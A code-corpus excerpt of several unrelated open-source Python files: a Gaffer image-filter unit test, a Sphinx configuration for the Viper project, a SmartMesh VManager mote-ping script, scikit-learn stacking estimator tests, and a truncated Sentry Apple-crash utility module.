# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferImage
import os
class FilterTest( unittest.TestCase ) :
def testDefaultFilter( self ) :
filters = GafferImage.Filter.filters()
default = GafferImage.Filter.defaultFilter()
self.assertTrue( default in filters )
def testFilterList( self ) :
filters = GafferImage.Filter.filters()
self.assertTrue( len(filters) == 9 )
self.assertTrue( "Box" in filters )
self.assertTrue( "BSpline" in filters )
self.assertTrue( "Bilinear" in filters )
self.assertTrue( "Hermite" in filters )
self.assertTrue( "Mitchell" in filters )
self.assertTrue( "CatmullRom" in filters )
self.assertTrue( "Cubic" in filters )
self.assertTrue( "Lanczos" in filters )
self.assertTrue( "Sinc" in filters )
def testCreators( self ) :
filters = GafferImage.Filter.filters()
for name in filters :
f = GafferImage.Filter.create( name )
self.assertTrue( f.typeName(), name+"Filter" )
|
cedriclaunay/gaffer
|
python/GafferImageTest/FilterTest.py
|
Python
|
bsd-3-clause
| 2,759
|
# -*- coding: utf-8 -*-
#
# Viper documentation build configuration file, created by
# sphinx-quickstart on Mon May 5 18:24:15 2014.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Viper'
copyright = u'2014, Claudio Guarnieri'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.1'
# The full version, including alpha/beta/rc tags.
release = '1.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Viperdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Viper.tex', u'Viper Documentation',
u'Claudio Guarnieri', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'viper', u'Viper Documentation',
[u'Claudio Guarnieri'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Viper', u'Viper Documentation',
u'Claudio Guarnieri', 'Viper', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
LMSlay/wiper
|
docs/source/conf.py
|
Python
|
bsd-3-clause
| 7,714
|
#!/usr/bin/python
'''
This script sends a ping to a specific mote and waits for the pingResponse
notification. If any other pingResponses are received, the program
continues listening and waits until the correct one is received.
'''
#============================ adjust path =====================================
import sys
import os
if __name__ == "__main__":
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..', 'libs'))
sys.path.insert(0, os.path.join(here, '..', 'external_libs'))
#============================ imports =========================================
import urllib3
import threading
import traceback
import time
import certifi
# generic SmartMeshSDK imports
from SmartMeshSDK import sdk_version
# VManager-specific imports
from VManagerSDK.vmanager import Configuration
from VManagerSDK.vmgrapi import VManagerApi
from VManagerSDK.vmanager.rest import ApiException
#============================ defines =========================================
DFLT_MGR_HOST = "127.0.0.1"
DFLT_MOTE_MAC = "00-17-0D-00-00-60-08-DC"
urllib3.disable_warnings() # disable warnings that show up about self-signed certificates
#============================ variables =======================================
mote_exists = False
stop_event = threading.Event()
#============================ helpers =========================================
def process_event(mydata):
global macaddr, myresponse, stop_event
if macaddr == mydata.mac_address and myresponse.callback_id == mydata.callback_id:
print '\nPing response from mote {0} with callbackID = {1}'.format(mydata.mac_address, mydata.callback_id)
print ' returned with result --> {0}'.format(mydata.result)
print ' date and time --> {0}'.format(mydata.sys_time)
print ' latency of response --> {0} mSec'.format(mydata.latency)
print ' mote at hop --> {0}'.format(mydata.hop_count)
print ' mote voltage reading = {0} v, and temperature = {1} C'.format(mydata.voltage, mydata.temperature)
stop_event.set()
else:
print ('\nReceived a ping response, but either different mote or wrong callbackID... still waiting --> {0} , {1}\n'.format(mydata.mac_address, mydata.callback_id))
def process_notif(notif):
'''
Dispatch notifications to specific processing functions.
'''
if notif.type in ('pingResponse'):
# handle ping response notifications
process_event(notif)
else:
# handle other event notifications
pass
#============================ main ============================================
try:
# print banner
print '\nVMgr_SendPing (c) Dust Networks'
print 'SmartMesh SDK {0}\n'.format('.'.join([str(i) for i in sdk_version.VERSION]))
mgrhost = raw_input('Enter the IP address of the manager (e.g. {0}): '.format(DFLT_MGR_HOST))
if mgrhost == "":
mgrhost = DFLT_MGR_HOST
macaddr = raw_input('Enter MAC address of mote to Ping (e.g. {0}): '.format(DFLT_MOTE_MAC))
if macaddr == "":
macaddr = DFLT_MOTE_MAC
macaddr = macaddr.upper() # make sure all letters are upper case
# log in as user "dust"
config = Configuration()
config.username = 'dust'
config.password = 'dust'
config.verify_ssl = False
if os.path.isfile(certifi.where()):
config.ssl_ca_cert = certifi.where()
else:
config.ssl_ca_cert = os.path.join(os.path.dirname(sys.executable), "cacert.pem")
# initialize the VManager Python library
voyager = VManagerApi(host=mgrhost)
# first test that the mote does exist and is operational
print '\n==== Verifying that the mote requested is in network and Operational'
mote_list = voyager.motesApi.get_motes()
for mote in mote_list.motes:
if mote.mac_address == macaddr and mote.state == "operational":
mote_exists = True
if mote_exists:
print '\n==== Sending Ping to the mote and wait for the response'
# start listening for data notifications
voyager.get_notifications('events', notif_callback=process_notif)
# send a ping to the mote
myresponse = voyager.motesApi.ping_mote(macaddr)
print ' Ping sent to mote {0}, callback = {1}'.format(macaddr, myresponse.callback_id)
# wait for the pingNotification response and then exit the program
print '\n Waiting for the pingResponse notification'
stop_event.wait()
voyager.stop_notifications()
print '\nScript ended normally'
else:
print '\n This MAC address is not joined to this network'
except:
traceback.print_exc()
print ('Script ended with an error.')
sys.exit()
|
realms-team/solmanager
|
libs/smartmeshsdk-REL-1.3.0.1/vmanager_apps/VMgr_SendPing.py
|
Python
|
bsd-3-clause
| 4,789
|
"""Test the stacking classifier and regressor."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: BSD 3 clause
import pytest
import numpy as np
import scipy.sparse as sparse
from sklearn.base import BaseEstimator
from sklearn.base import ClassifierMixin
from sklearn.base import RegressorMixin
from sklearn.base import clone
from sklearn.exceptions import ConvergenceWarning
from sklearn.datasets import load_iris
from sklearn.datasets import load_diabetes
from sklearn.datasets import load_breast_cancer
from sklearn.datasets import make_regression
from sklearn.datasets import make_classification
from sklearn.dummy import DummyClassifier
from sklearn.dummy import DummyRegressor
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import LinearRegression
from sklearn.svm import LinearSVC
from sklearn.svm import LinearSVR
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.preprocessing import scale
from sklearn.ensemble import StackingClassifier
from sklearn.ensemble import StackingRegressor
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import KFold
from sklearn.utils._mocking import CheckingClassifier
from sklearn.utils._testing import assert_allclose
from sklearn.utils._testing import assert_allclose_dense_sparse
from sklearn.utils._testing import ignore_warnings
from sklearn.utils.estimator_checks import check_estimator
from sklearn.utils.estimator_checks import check_no_attributes_set_in_init
X_diabetes, y_diabetes = load_diabetes(return_X_y=True)
X_iris, y_iris = load_iris(return_X_y=True)
@pytest.mark.parametrize(
"cv", [3, StratifiedKFold(n_splits=3, shuffle=True, random_state=42)]
)
@pytest.mark.parametrize(
"final_estimator", [None, RandomForestClassifier(random_state=42)]
)
@pytest.mark.parametrize("passthrough", [False, True])
def test_stacking_classifier_iris(cv, final_estimator, passthrough):
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, y_test = train_test_split(
scale(X_iris), y_iris, stratify=y_iris, random_state=42
)
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
clf = StackingClassifier(
estimators=estimators, final_estimator=final_estimator, cv=cv,
passthrough=passthrough
)
clf.fit(X_train, y_train)
clf.predict(X_test)
clf.predict_proba(X_test)
assert clf.score(X_test, y_test) > 0.8
X_trans = clf.transform(X_test)
expected_column_count = 10 if passthrough else 6
assert X_trans.shape[1] == expected_column_count
if passthrough:
assert_allclose(X_test, X_trans[:, -4:])
clf.set_params(lr='drop')
clf.fit(X_train, y_train)
clf.predict(X_test)
clf.predict_proba(X_test)
if final_estimator is None:
# LogisticRegression has decision_function method
clf.decision_function(X_test)
X_trans = clf.transform(X_test)
expected_column_count_drop = 7 if passthrough else 3
assert X_trans.shape[1] == expected_column_count_drop
if passthrough:
assert_allclose(X_test, X_trans[:, -4:])
def test_stacking_classifier_drop_column_binary_classification():
# check that a column is dropped in binary classification
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, _ = train_test_split(
scale(X), y, stratify=y, random_state=42
)
# both classifiers implement 'predict_proba' and will both drop one column
estimators = [('lr', LogisticRegression()),
('rf', RandomForestClassifier(random_state=42))]
clf = StackingClassifier(estimators=estimators, cv=3)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert X_trans.shape[1] == 2
# LinearSVC does not implement 'predict_proba' and will not drop one column
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
clf.set_params(estimators=estimators)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert X_trans.shape[1] == 2
def test_stacking_classifier_drop_estimator():
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_iris), y_iris, stratify=y_iris, random_state=42
)
estimators = [('lr', 'drop'), ('svc', LinearSVC(random_state=0))]
rf = RandomForestClassifier(n_estimators=10, random_state=42)
clf = StackingClassifier(
estimators=[('svc', LinearSVC(random_state=0))],
final_estimator=rf, cv=5
)
clf_drop = StackingClassifier(
estimators=estimators, final_estimator=rf, cv=5
)
clf.fit(X_train, y_train)
clf_drop.fit(X_train, y_train)
assert_allclose(clf.predict(X_test), clf_drop.predict(X_test))
assert_allclose(clf.predict_proba(X_test), clf_drop.predict_proba(X_test))
assert_allclose(clf.transform(X_test), clf_drop.transform(X_test))
def test_stacking_regressor_drop_estimator():
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_diabetes), y_diabetes, random_state=42
)
estimators = [('lr', 'drop'), ('svr', LinearSVR(random_state=0))]
rf = RandomForestRegressor(n_estimators=10, random_state=42)
reg = StackingRegressor(
estimators=[('svr', LinearSVR(random_state=0))],
final_estimator=rf, cv=5
)
reg_drop = StackingRegressor(
estimators=estimators, final_estimator=rf, cv=5
)
reg.fit(X_train, y_train)
reg_drop.fit(X_train, y_train)
assert_allclose(reg.predict(X_test), reg_drop.predict(X_test))
assert_allclose(reg.transform(X_test), reg_drop.transform(X_test))
@pytest.mark.parametrize(
"cv", [3, KFold(n_splits=3, shuffle=True, random_state=42)]
)
@pytest.mark.parametrize(
"final_estimator, predict_params",
[(None, {}),
(RandomForestRegressor(random_state=42), {}),
(DummyRegressor(), {'return_std': True})]
)
@pytest.mark.parametrize("passthrough", [False, True])
def test_stacking_regressor_diabetes(cv, final_estimator, predict_params,
passthrough):
# prescale the data to avoid convergence warning without using a pipeline
# for later assert
X_train, X_test, y_train, _ = train_test_split(
scale(X_diabetes), y_diabetes, random_state=42
)
estimators = [('lr', LinearRegression()), ('svr', LinearSVR())]
reg = StackingRegressor(
estimators=estimators, final_estimator=final_estimator, cv=cv,
passthrough=passthrough
)
reg.fit(X_train, y_train)
result = reg.predict(X_test, **predict_params)
expected_result_length = 2 if predict_params else 1
if predict_params:
assert len(result) == expected_result_length
X_trans = reg.transform(X_test)
expected_column_count = 12 if passthrough else 2
assert X_trans.shape[1] == expected_column_count
if passthrough:
assert_allclose(X_test, X_trans[:, -10:])
reg.set_params(lr='drop')
reg.fit(X_train, y_train)
reg.predict(X_test)
X_trans = reg.transform(X_test)
expected_column_count_drop = 11 if passthrough else 1
assert X_trans.shape[1] == expected_column_count_drop
if passthrough:
assert_allclose(X_test, X_trans[:, -10:])
@pytest.mark.parametrize('fmt', ['csc', 'csr', 'coo'])
def test_stacking_regressor_sparse_passthrough(fmt):
# Check passthrough behavior on a sparse X matrix
X_train, X_test, y_train, _ = train_test_split(
sparse.coo_matrix(scale(X_diabetes)).asformat(fmt),
y_diabetes, random_state=42
)
estimators = [('lr', LinearRegression()), ('svr', LinearSVR())]
rf = RandomForestRegressor(n_estimators=10, random_state=42)
clf = StackingRegressor(
estimators=estimators, final_estimator=rf, cv=5, passthrough=True
)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert_allclose_dense_sparse(X_test, X_trans[:, -10:])
assert sparse.issparse(X_trans)
assert X_test.format == X_trans.format
@pytest.mark.parametrize('fmt', ['csc', 'csr', 'coo'])
def test_stacking_classifier_sparse_passthrough(fmt):
# Check passthrough behavior on a sparse X matrix
X_train, X_test, y_train, _ = train_test_split(
sparse.coo_matrix(scale(X_iris)).asformat(fmt),
y_iris, random_state=42
)
estimators = [('lr', LogisticRegression()), ('svc', LinearSVC())]
rf = RandomForestClassifier(n_estimators=10, random_state=42)
clf = StackingClassifier(
estimators=estimators, final_estimator=rf, cv=5, passthrough=True
)
clf.fit(X_train, y_train)
X_trans = clf.transform(X_test)
assert_allclose_dense_sparse(X_test, X_trans[:, -4:])
assert sparse.issparse(X_trans)
assert X_test.format == X_trans.format
def test_stacking_classifier_drop_binary_prob():
# check that classifier will drop one of the probability column for
# binary classification problem
# Select only the 2 first classes
X_, y_ = scale(X_iris[:100]), y_iris[:100]
estimators = [
('lr', LogisticRegression()), ('rf', RandomForestClassifier())
]
clf = StackingClassifier(estimators=estimators)
clf.fit(X_, y_)
X_meta = clf.transform(X_)
assert X_meta.shape[1] == 2
class NoWeightRegressor(RegressorMixin, BaseEstimator):
def fit(self, X, y):
self.reg = DummyRegressor()
return self.reg.fit(X, y)
def predict(self, X):
return np.ones(X.shape[0])
class NoWeightClassifier(ClassifierMixin, BaseEstimator):
def fit(self, X, y):
self.clf = DummyClassifier(strategy='stratified')
return self.clf.fit(X, y)
@pytest.mark.parametrize(
"y, params, type_err, msg_err",
[(y_iris,
{'estimators': None},
ValueError, "Invalid 'estimators' attribute,"),
(y_iris,
{'estimators': []},
ValueError, "Invalid 'estimators' attribute,"),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('svm', SVC(max_iter=5e4))],
'stack_method': 'predict_proba'},
ValueError, 'does not implement the method predict_proba'),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('cor', NoWeightClassifier())]},
TypeError, 'does not support sample weight'),
(y_iris,
{'estimators': [('lr', LogisticRegression()),
('cor', LinearSVC(max_iter=5e4))],
'final_estimator': NoWeightClassifier()},
TypeError, 'does not support sample weight')]
)
def test_stacking_classifier_error(y, params, type_err, msg_err):
with pytest.raises(type_err, match=msg_err):
clf = StackingClassifier(**params, cv=3)
clf.fit(
scale(X_iris), y, sample_weight=np.ones(X_iris.shape[0])
)
@pytest.mark.parametrize(
"y, params, type_err, msg_err",
[(y_diabetes,
{'estimators': None},
ValueError, "Invalid 'estimators' attribute,"),
(y_diabetes,
{'estimators': []},
ValueError, "Invalid 'estimators' attribute,"),
(y_diabetes,
{'estimators': [('lr', LinearRegression()),
('cor', NoWeightRegressor())]},
TypeError, 'does not support sample weight'),
(y_diabetes,
{'estimators': [('lr', LinearRegression()),
('cor', LinearSVR())],
'final_estimator': NoWeightRegressor()},
TypeError, 'does not support sample weight')]
)
def test_stacking_regressor_error(y, params, type_err, msg_err):
with pytest.raises(type_err, match=msg_err):
reg = StackingRegressor(**params, cv=3)
reg.fit(
scale(X_diabetes), y, sample_weight=np.ones(X_diabetes.shape[0])
)
@pytest.mark.parametrize(
"estimator, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression(random_state=0)),
('svm', LinearSVC(random_state=0))]),
X_iris[:100], y_iris[:100]), # keep only classes 0 and 1
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=0))]),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_randomness(estimator, X, y):
# checking that fixing the random state of the CV will lead to the same
# results
estimator_full = clone(estimator)
estimator_full.set_params(
cv=KFold(shuffle=True, random_state=np.random.RandomState(0))
)
estimator_drop = clone(estimator)
estimator_drop.set_params(lr='drop')
estimator_drop.set_params(
cv=KFold(shuffle=True, random_state=np.random.RandomState(0))
)
assert_allclose(
estimator_full.fit(X, y).transform(X)[:, 1:],
estimator_drop.fit(X, y).transform(X)
)
# These warnings are raised due to _BaseComposition
@pytest.mark.filterwarnings("ignore:TypeError occurred during set_params")
@pytest.mark.filterwarnings("ignore:Estimator's parameters changed after")
@pytest.mark.parametrize(
"estimator",
[StackingClassifier(
estimators=[('lr', LogisticRegression(random_state=0)),
('tree', DecisionTreeClassifier(random_state=0))]),
StackingRegressor(
estimators=[('lr', LinearRegression()),
('tree', DecisionTreeRegressor(random_state=0))])],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_check_estimators_stacking_estimator(estimator):
check_estimator(estimator)
check_no_attributes_set_in_init(estimator.__class__.__name__, estimator)
def test_stacking_classifier_stratify_default():
# check that we stratify the classes for the default CV
clf = StackingClassifier(
estimators=[('lr', LogisticRegression(max_iter=1e4)),
('svm', LinearSVC(max_iter=1e4))]
)
# since iris is not shuffled, a simple k-fold would not contain the
# 3 classes during training
clf.fit(X_iris, y_iris)
@pytest.mark.parametrize(
"stacker, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression()),
('svm', LinearSVC(random_state=42))],
final_estimator=LogisticRegression(),
cv=KFold(shuffle=True, random_state=42)),
*load_breast_cancer(return_X_y=True)),
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=42))],
final_estimator=LinearRegression(),
cv=KFold(shuffle=True, random_state=42)),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_with_sample_weight(stacker, X, y):
# check that sample weights has an influence on the fitting
# note: ConvergenceWarning are catch since we are not worrying about the
# convergence here
n_half_samples = len(y) // 2
total_sample_weight = np.array(
[0.1] * n_half_samples + [0.9] * (len(y) - n_half_samples)
)
X_train, X_test, y_train, _, sample_weight_train, _ = train_test_split(
X, y, total_sample_weight, random_state=42
)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train)
y_pred_no_weight = stacker.predict(X_test)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train, sample_weight=np.ones(y_train.shape))
y_pred_unit_weight = stacker.predict(X_test)
assert_allclose(y_pred_no_weight, y_pred_unit_weight)
with ignore_warnings(category=ConvergenceWarning):
stacker.fit(X_train, y_train, sample_weight=sample_weight_train)
y_pred_biased = stacker.predict(X_test)
assert np.abs(y_pred_no_weight - y_pred_biased).sum() > 0
def test_stacking_classifier_sample_weight_fit_param():
# check sample_weight is passed to all invocations of fit
stacker = StackingClassifier(
estimators=[
('lr', CheckingClassifier(expected_fit_params=['sample_weight']))
],
final_estimator=CheckingClassifier(
expected_fit_params=['sample_weight']
)
)
stacker.fit(X_iris, y_iris, sample_weight=np.ones(X_iris.shape[0]))
@pytest.mark.filterwarnings("ignore::sklearn.exceptions.ConvergenceWarning")
@pytest.mark.parametrize(
"stacker, X, y",
[(StackingClassifier(
estimators=[('lr', LogisticRegression()),
('svm', LinearSVC(random_state=42))],
final_estimator=LogisticRegression()),
*load_breast_cancer(return_X_y=True)),
(StackingRegressor(
estimators=[('lr', LinearRegression()),
('svm', LinearSVR(random_state=42))],
final_estimator=LinearRegression()),
X_diabetes, y_diabetes)],
ids=['StackingClassifier', 'StackingRegressor']
)
def test_stacking_cv_influence(stacker, X, y):
# check that the stacking affects the fit of the final estimator but not
# the fit of the base estimators
# note: ConvergenceWarning are catch since we are not worrying about the
# convergence here
stacker_cv_3 = clone(stacker)
stacker_cv_5 = clone(stacker)
stacker_cv_3.set_params(cv=3)
stacker_cv_5.set_params(cv=5)
stacker_cv_3.fit(X, y)
stacker_cv_5.fit(X, y)
# the base estimators should be identical
for est_cv_3, est_cv_5 in zip(stacker_cv_3.estimators_,
stacker_cv_5.estimators_):
assert_allclose(est_cv_3.coef_, est_cv_5.coef_)
# the final estimator should be different
with pytest.raises(AssertionError, match='Not equal'):
assert_allclose(stacker_cv_3.final_estimator_.coef_,
stacker_cv_5.final_estimator_.coef_)
@pytest.mark.parametrize("make_dataset, Stacking, Estimator", [
(make_classification, StackingClassifier, LogisticRegression),
(make_regression, StackingRegressor, LinearRegression)
])
def test_stacking_without_n_features_in(make_dataset, Stacking, Estimator):
# Stacking supports estimators without `n_features_in_`. Regression test
# for #17353
class MyEstimator(Estimator):
"""Estimator without n_features_in_"""
def fit(self, X, y):
super().fit(X, y)
del self.n_features_in_
X, y = make_dataset(random_state=0, n_samples=100)
stacker = Stacking(estimators=[('lr', MyEstimator())])
msg = f"{Stacking.__name__} object has no attribute n_features_in_"
with pytest.raises(AttributeError, match=msg):
stacker.n_features_in_
# Does not raise
stacker.fit(X, y)
msg = "'MyEstimator' object has no attribute 'n_features_in_'"
with pytest.raises(AttributeError, match=msg):
stacker.n_features_in_
|
bnaul/scikit-learn
|
sklearn/ensemble/tests/test_stacking.py
|
Python
|
bsd-3-clause
| 19,101
|
from __future__ import absolute_import
import six
import logging
from collections import namedtuple
from symsynd.macho.arch import get_cpu_name
from symsynd.utils import parse_addr
from sentry.interfaces.contexts import DeviceContextType
logger = logging.getLogger(__name__)
APPLE_SDK_MAPPING = {
'iPhone OS': 'iOS',
'tvOS': 'tvOS',
'Mac OS': 'macOS',
'watchOS': 'watchOS',
}
KNOWN_DSYM_TYPES = {
'iOS': 'macho',
'tvOS': 'macho',
'macOS': 'macho',
'watchOS': 'macho',
}
AppInfo = namedtuple('AppInfo', ['id', 'version', 'build', 'name'])
def find_apple_crash_report_referenced_images(binary_images, threads):
"""Given some binary images from an apple crash report and a thread
list this returns a list of image UUIDs to load.
"""
image_map = {}
for image in binary_images:
image_map[image['image_addr']] = image['uuid']
to_load = set()
for thread in threads:
if 'backtrace' not in thread:
continue
for frame in thread['backtrace']['contents']:
img_uuid = image_map.get(frame['object_addr'])
if img_uuid is not None:
to_load.add(img_uuid)
return list(to_load)
def find_all_stacktraces(data):
"""Given a data dictionary from an event this returns all
relevant stacktraces in a list. If a frame contains a raw_stacktrace
property it's preferred over the processed one.
"""
rv = []
def _probe_for_stacktrace(container):
raw = container.get('raw_stacktrace')
if raw is not None:
rv.append((raw, container))
else:
processed = container.get('stacktrace')
if processed is not None:
rv.append((processed, container))
exc_container = data.get('sentry.interfaces.Exception')
if exc_container:
for exc in exc_container['values']:
_probe_for_stacktrace(exc)
# The legacy stacktrace interface does not support raw stacktraces
stacktrace = data.get('sentry.interfaces.Stacktrace')
if stacktrace:
rv.append((stacktrace, None))
threads = data.get('threads')
if threads:
for thread in threads['values']:
_probe_for_stacktrace(thread)
return rv
def get_sdk_from_event(event):
sdk_info = (event.get('debug_meta') or {}).get('sdk_info')
if sdk_info:
return sdk_info
os = (event.get('contexts') or {}).get('os')
if os and os.get('type') == 'os':
return get_sdk_from_os(os)
def get_sdk_from_os(data):
if 'name' not in data or 'version' not in data:
return
dsym_type = KNOWN_DSYM_TYPES.get(data['name'])
if dsym_type is None:
return
try:
system_version = tuple(int(x) for x in (
data['version'] + '.0' * 3).split('.')[:3])
except ValueError:
return
return {
'dsym_type': 'macho',
'sdk_name': data['name'],
'version_major': system_version[0],
'version_minor': system_version[1],
'version_patchlevel': system_version[2],
'build': data.get('build'),
}
def get_sdk_from_apple_system_info(info):
if not info:
return None
try:
# Support newer mapping in old format.
if info['system_name'] in KNOWN_DSYM_TYPES:
sdk_name = info['system_name']
else:
sdk_name = APPLE_SDK_MAPPING[info['system_name']]
system_version = tuple(int(x) for x in (
info['system_version'] + '.0' * 3).split('.')[:3])
except (ValueError, LookupError):
return None
return {
'dsym_type': 'macho',
'sdk_name': sdk_name,
'version_major': system_version[0],
'version_minor': system_version[1],
'version_patchlevel': system_version[2],
}
def cpu_name_from_data(data):
"""Returns the CPU name from the given data if it exists."""
device = DeviceContextType.primary_value_for_data(data)
if device:
arch = device.get('arch')
if isinstance(arch, six.string_types):
return arch
# TODO: kill this here. we want to not support that going forward
unique_cpu_name = None
images = (data.get('debug_meta') or {}).get('images') or []
for img in images:
cpu_name = get_cpu_name(img['cpu_type'],
img['cpu_subtype'])
if unique_cpu_name is None:
unique_cpu_name = cpu_name
elif unique_cpu_name != cpu_name:
unique_cpu_name = None
break
return unique_cpu_name
def version_build_from_data(data):
"""Returns release and build string from the given data if it exists."""
app_context = data.get('contexts', {}).get('app', {})
if app_context is not None:
if (app_context.get('app_identifier', None) and
app_context.get('app_version', None) and
app_context.get('app_build', None) and
app_context.get('app_name', None)):
return AppInfo(
